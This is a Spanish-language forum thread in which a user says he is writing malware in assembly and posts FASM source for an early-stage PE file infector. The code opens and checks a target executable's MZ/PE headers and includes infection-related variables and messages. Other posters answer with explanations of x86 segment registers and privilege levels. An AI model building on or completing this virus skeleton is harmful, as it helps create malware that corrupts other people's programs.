 Autor
|
Tema: ¿Como hacer que los registros DS y ES apunten al Segmento de Codigo (CS)??? (Leído 3,562 veces)
|
harry_the_blogger
 Desconectado
Mensajes: 105
Visita mi blog es enriquemesa.blogspot.com
|
Hola, estoy desarrollando un malware en ensamblador. Ya ha fallado varias veces cuando intento hacer una operacion que usa los registros ESI y EDI. Lo he analizado y he descubierto que los registros DS y ES no apuntan a los datos embebidos dentro del mismo segmento de codigo.
Por eso necesito que me ayuden un poco explicandome como hacer que los registros DS (Data Segment) y ES apunten hacia CS (Code Segment). Será que pueden darme un breve ejemplo en codigo de como hacerlo?? Gracias de antemano por sus respuestas.
|
|
|
|
|
En línea
|
Vista mi blog es enriquemesa.blogspot.com
|
|
|
Eternal Idol
Kernel coder
Moderador
Desconectado
Mensajes: 5.937
Israel nunca torturó niños, ni lo volverá a hacer.
|
push cs pop ds
Siempre es mejor exponer el problema que uno tiene en detalle (S.O., extracto de codigo, etc.) y no la solucion que cree debe darle.
|
|
|
|
|
En línea
|
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón
|
|
|
harry_the_blogger
Desconectado
Mensajes: 105
Visita mi blog es enriquemesa.blogspot.com
|
Gracias Eternal Idol, sé que debí ser un poco más especifico y comentar más acerca de mi problema, pero no sé si al explicar un poco más mi problema, la gente no responda y no quiero que piensen que soy vago o que no estoy trabajando por una solucion.
Ah, la solucion que me brindaste ya la había probado antes, y aún así mi programa falló. Ahora pienso que debe haber otra cosa que está mal en mi codigo. Por ahora no preguntaré más, para no saturar el foro de preguntas mías.
Gracias por tu respuesta.
|
|
|
|
|
En línea
|
Vista mi blog es enriquemesa.blogspot.com
|
|
|
xv0
Desconectado
Mensajes: 1.026
|
Corrijanme si me equivoco, pero para modificar los registros de los segmentos necesitas tener privilegios en CPL. En que modo estas?
A porcierto estas en x86 o en x64?
Recuerdo a ver leido de que en x64, se puede modificar los valores de fs y gs con una instruccion sin tener ningun tipo de privilejio, pero tienes que tenerla activada en el registro de control cr4.
Un saludo.
|
|
|
|
|
En línea
|
|
|
|
harry_the_blogger
Desconectado
Mensajes: 105
Visita mi blog es enriquemesa.blogspot.com
|
cpuz , estoy trabajando en x86. Usé el codigo que me dio Eternal Idol, pero mi programa falla de nuevo. No sé si necesito permisos para cambiar los registros de segmento. Bueno, si tu dices que necesito permisos, será reescribir el codigo de nuevo y evitar usar esos registros. push cs pop ds push cs pop es
A mí no me funciono. Estoy compilando con FASM, y compila bien. Pero en tiempo de ejecucion falla. Aqui dejo el codigo completo: format pe console 4.0 include 'C:\fasm\INCLUDE\WIN32AX.INC' section '.text' readable writable executable virus_size_before_compilation equ (end_of_file-main) main: invoke CreateFile, cFileName, GENERIC_READ, 0, 0, 4, FILE_ATTRIBUTE_NORMAL, 0 mov [file_handle], eax ;I get the filesize of the host, and move it to a variable. ;This data could be interesting in a near future invoke GetFileSize, [file_handle], 0 mov [host_size], eax ;Calculates the possible new size of the executable ;add eax, virus_size ;mov [infected_size], eax ;Read 8000 bytes from the file invoke ReadFile, [file_handle], buffer, 8000, bytesread, 0 ; Now read the full file ;Debugging purpouses. invoke MessageBox, NULL, addr msg, addr msg_caption, MB_OK ; Easy way of outputing the text invoke MessageBox, NULL, addr cFileName, addr msg_caption, MB_OK ;You must verify that the API has successfully opened and read bytes from the file invoke MessageBox, NULL, addr buffer, addr msg_caption, MB_OK lea edx, [buffer] ;Load in edx the address of buffer ;I use the edx register as a pointer to the buffer. ;Now I am in the DOS header. cmp word [edx], "MZ" ;Check if the file is a real executable jnz bad_executable add edx, [edx+60] ;This instruction modify the pointer. ;Now the edx register points to a position ;60 bytes (3C in hex) after the begin of buffer ;Now I am in the PE Header cmp word [edx], "PE" ;I check if the executable has a valid PE header ;This is very useful to know if I am infecting ;an old DOS program instead a Win32 executable. jnz bad_executable call good_executable ;First, make a routine that verifies that the DS:ESI and ES:EDI ;pair of segments are correct and they points to the Code Segment push cs pop ds push cs pop es invoke MessageBox, NULL, addr end_message, addr msg_caption, MB_OK ret good_executable: invoke MessageBox, NULL, addr msg_found, addr msg_caption, MB_OK ret bad_executable: invoke MessageBox, NULL, addr msg_not_found, addr msg_caption, MB_OK ret datazone: cFileName db 'test.exe', 0 ;This buffer will store parts of the whole file. buffer rb 8000 ;Strings zone... end_message db 'The file was sucessfully infected...', 0 msg_found db 'I have found a Real EXE!!!...', 0 msg_not_found db 'The current exe file is invalid...', 0 file_signal db 'X' end_msg db 'End of program', 0 msg db 'File founded', 0 msg_caption db 'Assembly program...', 0 sign db 'Sorry, You have HIV...', 0 byteswritten dd ? bytesread dd ? ;Variables needed by the infection function file_handle dd ? host_size dd ? map_handle dd ? infected_size dd ? virus_size dd virus_size_before_compilation OldEip dd ? end_of_file: .end main
|
|
|
|
|
En línea
|
Vista mi blog es enriquemesa.blogspot.com
|
|
|
Eternal Idol
Kernel coder
Moderador
Desconectado
Mensajes: 5.937
Israel nunca torturó niños, ni lo volverá a hacer.
|
cpuz , estoy trabajando en x86. Usé el codigo que me dio Eternal Idol, pero mi programa falla de nuevo. No sé si necesito permisos para cambiar los registros de segmento. Bueno, si tu dices que necesito permisos, será reescribir el codigo de nuevo y evitar usar esos registros. Deberias decirnos exactamente donde falla. ¿Lo depuraste? ¿CreateFile retorna algo diferente a -1 (0xFFFFFFFF) pese a que intentes abrir el archivo en modo exclusivo? Sinceramente no se donde donde esta la relacion con los segmentos todavia ...
|
|
|
|
|
En línea
|
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón
|
|
|
xv0
Desconectado
Mensajes: 1.026
|
Deberias decirnos exactamente donde falla. ¿Lo depuraste? ¿CreateFile retorna algo diferente a -1 (0xFFFFFFFF) pese a que intentes abrir el archivo en modo exclusivo? Sinceramente no se donde donde esta la relacion con los segmentos todavia ...
Exacto, no se que pintan los segmentos hay, pero una cosa @EI es correcto que los segmentos solo se pueden modificar con privilegios en CPL, en ring3 nada, no? O eso entendi en los manuales. @harry_the_blogger
Podrias utilizar push para guardar los retornos de las funciones, mejor que moverlos a .data. Un saludo.
|
|
|
|
|
En línea
|
|
|
|
Eternal Idol
Kernel coder
Moderador
Desconectado
Mensajes: 5.937
Israel nunca torturó niños, ni lo volverá a hacer.
|
Exacto, no se que pintan los segmentos hay, pero una cosa @EI es correcto que los segmentos solo se pueden modificar con privilegios en CPL, en ring3 nada, no? Claro, esto genera una excepcion, por eso le dije al principio que deberia intentar explicar su PROBLEMA y no la supuesta SOLUCION. Si hubiera estado en modo real el codigo le hubiera servido pero en este caso es seguro que el PROBLEMA es otro y obviamente otra sera la SOLUCION.
|
|
|
|
|
En línea
|
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
como hacer un contador de lineas de codigo en C
Programación C/C++
|
Syscrew
|
3
|
16,470
|
6 Junio 2011, 20:05 pm
por Syscrew
|
|
|
|
Como hacer que tome registros este programa desde un txt y aplique la funcion
« 1 2 »
Programación C/C++
|
luis456
|
10
|
4,908
|
13 Enero 2013, 12:08 pm
por luis456
|
|
|
|
Como hacer caer registros en BD sql server usando C# MVC
.NET (C#, VB.NET, ASP)
|
Merian22
|
1
|
2,536
|
18 Diciembre 2014, 03:49 am
por Eleкtro
|
|
|
|
Por que no hay fallo de segmento en este codigo?
Programación C/C++
|
digimikeh
|
3
|
2,483
|
29 Octubre 2020, 03:17 am
por digimikeh
|
|
|
|
¿Cómo podría hacer sniffing sobre una máquina perteneciente a un segmento de red distinto al mio?
Hacking
|
FernanditoGC
|
0
|
2,373
|
31 Enero 2022, 14:11 pm
por FernanditoGC
|
 |
